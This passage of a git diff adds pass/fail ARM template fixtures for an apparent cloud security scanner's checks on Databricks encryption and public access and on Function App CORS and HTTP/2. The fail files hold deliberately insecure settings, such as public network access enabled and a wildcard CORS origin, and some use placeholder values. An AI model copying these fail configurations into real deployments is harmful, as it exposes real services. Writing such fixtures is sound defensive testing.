--- /dev/null +++ b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail.json @@ -0,0 +1,68 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "managedResourceGroupName": { + "type": "string" + }, + "workspaceName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Databricks workspace to create." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "Location for all resources." + } + }, + "pricingTier": { + "type": "string", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The pricing tier of workspace." + } + }, + "keyVaultName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault name." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault encryption key name." + } + }, + "disablePublicIp": { + "type": "bool", + "metadata": { + "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not" + } + } + }, + "resources": [ + { + "type": "Microsoft.Databricks/workspaces", + "apiVersion": "2023-02-01", + "name": "[parameters('workspaceName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('pricingTier')]" + }, + "properties": { + "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]", + "parameters": { + "enableNoPublicIp": { + "value": "[parameters('disablePublicIp')]" + } + } + } + } + ] + } \ No newline at end of file diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail2.json b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail2.json new file mode 100644 index 00000000000..04be1022e1e --- /dev/null +++ b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail2.json @@ -0,0 +1,71 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "managedResourceGroupName": { + "type": "string" + }, + "workspaceName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Databricks workspace to create." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "Location for all resources." + } + }, + "pricingTier": { + "type": "string", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The pricing tier of workspace." + } + }, + "keyVaultName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault name." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault encryption key name." + } + }, + "disablePublicIp": { + "type": "bool", + "metadata": { + "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not" + } + } + }, + "resources": [ + { + "type": "Microsoft.Databricks/workspaces", + "apiVersion": "2023-02-01", + "name": "[parameters('workspaceName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('pricingTier')]" + }, + "properties": { + "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]", + "parameters": { + "prepareEncryption": { + "value": false + }, + "enableNoPublicIp": { + "value": "[parameters('disablePublicIp')]" + } + } + } + } + ] + } \ No newline at end of file diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/pass.json b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/pass.json new file mode 100644 index 00000000000..ae285e6fc7c --- /dev/null +++ b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/pass.json @@ -0,0 +1,78 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "managedResourceGroupName": { + "type": "string" + }, + "workspaceName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Databricks workspace to create." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "Location for all resources." + } + }, + "pricingTier": { + "type": "string", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The pricing tier of workspace." + } + }, + "keyVaultName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault name." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault encryption key name." + } + }, + "disablePublicIp": { + "type": "bool", + "metadata": { + "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not" + } + } + }, + "resources": [ + { + "type": "Microsoft.Databricks/workspaces", + "apiVersion": "2023-02-01", + "name": "[parameters('workspaceName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('pricingTier')]" + }, + "properties": { + "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]", + "parameters": { + "prepareEncryption": { + "value": true + }, + "encryption": { + "value": { + "keySource": "Microsoft.Keyvault", + "keyvaulturi": "[uri(format('https://{0}{1}', parameters('keyVaultName'), environment().suffixes.keyvaultDns), '/')]", + "KeyName": "[parameters('keyName')]" + } + }, + "enableNoPublicIp": { + "value": "[parameters('disablePublicIp')]" + } + } + } + } + ] + } \ No newline at end of file diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail.json b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail.json new file mode 100644 index 00000000000..62aa4f41eda --- /dev/null +++ b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail.json @@ -0,0 +1,69 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "managedResourceGroupName": { + "type": "string" + }, + "workspaceName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Databricks workspace to create." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "Location for all resources." + } + }, + "pricingTier": { + "type": "string", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The pricing tier of workspace." + } + }, + "keyVaultName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault name." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault encryption key name." + } + }, + "disablePublicIp": { + "type": "bool", + "metadata": { + "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not" + } + } + }, + "resources": [ + { + "type": "Microsoft.Databricks/workspaces", + "apiVersion": "2023-02-01", + "name": "[parameters('workspaceName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('pricingTier')]" + }, + "properties": { + "publicNetworkAccess": "Enabled", + "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]", + "parameters": { + "enableNoPublicIp": { + "value": "[parameters('disablePublicIp')]" + } + } + } + } + ] + } \ No newline at end of file diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail2.json b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail2.json new file mode 100644 index 00000000000..b8ca21f4a5b --- /dev/null +++ b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail2.json @@ -0,0 +1,68 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "managedResourceGroupName": { + "type": "string" + }, + "workspaceName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Databricks workspace to create." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "Location for all resources." + } + }, + "pricingTier": { + "type": "string", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The pricing tier of workspace." + } + }, + "keyVaultName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault name." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault encryption key name." + } + }, + "disablePublicIp": { + "type": "bool", + "metadata": { + "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not" + } + } + }, + "resources": [ + { + "type": "Microsoft.Databricks/workspaces", + "apiVersion": "2023-02-01", + "name": "[parameters('workspaceName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('pricingTier')]" + }, + "properties": { + "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]", + "parameters": { + "enableNoPublicIp": { + "value": "[parameters('disablePublicIp')]" + } + } + } + } + ] + } \ No newline at end of file diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass.json b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass.json new file mode 100644 index 00000000000..64772cc8e6a --- /dev/null +++ b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass.json @@ -0,0 +1,70 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "managedResourceGroupName": { + "type": "string" + }, + "workspaceName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Databricks workspace to create." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "Location for all resources." + } + }, + "pricingTier": { + "type": "string", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The pricing tier of workspace." + } + }, + "keyVaultName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault name." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault encryption key name." + } + }, + "disablePublicIp": { + "type": "bool", + "metadata": { + "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not" + } + } + }, + "resources": [ + { + "type": "Microsoft.Databricks/workspaces", + "apiVersion": "2023-02-01", + "name": "[parameters('workspaceName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('pricingTier')]" + }, + "properties": { + "publicNetworkAccess": "Disabled", + "requiredNsgRules": "AllRules", + "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]", + "parameters": { + "enableNoPublicIp": { + "value": "[parameters('disablePublicIp')]" + } + } + } + } + ] + } \ No newline at end of file diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass2.json b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass2.json new file mode 100644 index 00000000000..6b687ab7b3e --- /dev/null +++ b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass2.json @@ -0,0 +1,70 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "managedResourceGroupName": { + "type": "string" + }, + "workspaceName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Databricks workspace to create." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "Location for all resources." + } + }, + "pricingTier": { + "type": "string", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The pricing tier of workspace." + } + }, + "keyVaultName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault name." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault encryption key name." + } + }, + "disablePublicIp": { + "type": "bool", + "metadata": { + "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not" + } + } + }, + "resources": [ + { + "type": "Microsoft.Databricks/workspaces", + "apiVersion": "2023-02-01", + "name": "[parameters('workspaceName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('pricingTier')]" + }, + "properties": { + "publicNetworkAccess": "Disabled", + "requiredNsgRules": "NoAzureDatabricksRules", + "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]", + "parameters": { + "enableNoPublicIp": { + "value": "[parameters('disablePublicIp')]" + } + } + } + } + ] + } \ No newline at end of file diff --git a/tests/arm/checks/resource/example_FunctionAppDisallowCORS/fail.json b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/fail.json new file mode 100644 index 00000000000..a1c52a80fe6 --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/fail.json @@ -0,0 +1,81 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "siteName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Web App." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "The Azure region where the resource should be deployed." + } + }, + "sku": { + "type": "string", + "defaultValue": "Free", + "allowedValues": [ + "Free", + "Shared", + "Basic", + "Standard", + "Premium" + ], + "metadata": { + "description": "The pricing tier of the Azure Web App." + } + }, + "appServicePlanName": { + "type": "string", + "metadata": { + "description": "The name of the App Service Plan to use." + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2019-08-01", + "name": "fail", + "location": "[parameters('location')]", + "properties": { + "name": "[parameters('siteName')]", + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]", + "siteConfig": { + "appSettings": [ + { + "name": "Setting1", + "value": "Value1" + }, + { + "name": "Setting2", + "value": "Value2" + } + ], + "metadata": [ + { + "name": "Key1", + "value": "Value1" + }, + { + "name": "Key2", + "value": "Value2" + } + ], + "cors": { + "allowedOrigins": ["*"] + } + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]" + ], + "sku": { + "name": "[parameters('sku')]" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass.json b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass.json new file mode 100644 index 00000000000..d4db5386dc0 --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass.json @@ -0,0 +1,56 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "siteName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Web App." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "The Azure region where the resource should be deployed." + } + }, + "sku": { + "type": "string", + "defaultValue": "Free", + "allowedValues": [ + "Free", + "Shared", + "Basic", + "Standard", + "Premium" + ], + "metadata": { + "description": "The pricing tier of the Azure Web App." + } + }, + "appServicePlanName": { + "type": "string", + "metadata": { + "description": "The name of the App Service Plan to use." + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2019-08-01", + "name": "pass", + "location": "[parameters('location')]", + "properties": { + "name": "[parameters('siteName')]", + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]" + }, + "dependsOn": [ + "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]" + ], + "sku": { + "name": "[parameters('sku')]" + } + } + ] +} diff --git a/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass_with_cors.json b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass_with_cors.json new file mode 100644 index 00000000000..89588498bbb --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass_with_cors.json @@ -0,0 +1,81 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "siteName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Web App." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "The Azure region where the resource should be deployed." + } + }, + "sku": { + "type": "string", + "defaultValue": "Free", + "allowedValues": [ + "Free", + "Shared", + "Basic", + "Standard", + "Premium" + ], + "metadata": { + "description": "The pricing tier of the Azure Web App." + } + }, + "appServicePlanName": { + "type": "string", + "metadata": { + "description": "The name of the App Service Plan to use." + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2019-08-01", + "name": "pass_with_cors", + "location": "[parameters('location')]", + "properties": { + "name": "[parameters('siteName')]", + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]", + "siteConfig": { + "appSettings": [ + { + "name": "Setting1", + "value": "Value1" + }, + { + "name": "Setting2", + "value": "Value2" + } + ], + "metadata": [ + { + "name": "Key1", + "value": "Value1" + }, + { + "name": "Key2", + "value": "Value2" + } + ], + "cors": { + "allowedOrigins": ["192.0.0.1"] + } + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]" + ], + "sku": { + "name": "[parameters('sku')]" + } + } + ] +} diff --git a/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail.json b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail.json new file mode 100644 index 00000000000..fda341efc0e --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail.json @@ -0,0 +1,374 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "vaultName": { + "type": "string", + "metadata": { + "description": "The name of the key vault to be created." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The name of the key to be created." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of the resources" + } + }, + "skuName": { + "type": "string", + "defaultValue": "standard", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The SKU of the vault to be created." + } + }, + "keyType": { + "type": "string", + "defaultValue": "RSA", + "allowedValues": [ + "EC", + "EC-HSM", + "RSA", + "RSA-HSM" + ], + "metadata": { + "description": "The JsonWebKeyType of the key to be created." + } + }, + "keyOps": { + "type": "array", + "defaultValue": [], + "metadata": { + "description": "The permitted JSON web key operations of the key to be created." + } + }, + "keySize": { + "type": "int", + "defaultValue": 2048, + "metadata": { + "description": "The size in bits of the key to be created." + } + }, + "curveName": { + "type": "string", + "defaultValue": "", + "allowedValues": [ + "", + "P-256", + "P-256K", + "P-384", + "P-521" + ], + "metadata": { + "description": "The JsonWebKeyCurveName of the key to be created." + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2022-09-01", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": false, + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ], + "outputs": { + "proxyKey": { + "type": "object", + "value": "[reference(resourceId('Microsoft.KeyVault/vaults/keys', parameters('vaultName'), parameters('keyName')))]" + } + } +} + diff --git a/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail2.json b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail2.json new file mode 100644 index 00000000000..64592e64706 --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail2.json @@ -0,0 +1,373 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "vaultName": { + "type": "string", + "metadata": { + "description": "The name of the key vault to be created." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The name of the key to be created." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of the resources" + } + }, + "skuName": { + "type": "string", + "defaultValue": "standard", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The SKU of the vault to be created." + } + }, + "keyType": { + "type": "string", + "defaultValue": "RSA", + "allowedValues": [ + "EC", + "EC-HSM", + "RSA-HSM" + ], + "metadata": { + "description": "The JsonWebKeyType of the key to be created." + } + }, + "keyOps": { + "type": "array", + "defaultValue": [], + "metadata": { + "description": "The permitted JSON web key operations of the key to be created." + } + }, + "keySize": { + "type": "int", + "defaultValue": 2048, + "metadata": { + "description": "The size in bits of the key to be created." + } + }, + "curveName": { + "type": "string", + "defaultValue": "", + "allowedValues": [ + "", + "P-256", + "P-256K", + "P-384", + "P-521" + ], + "metadata": { + "description": "The JsonWebKeyCurveName of the key to be created." + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "fail2", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": false, + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + 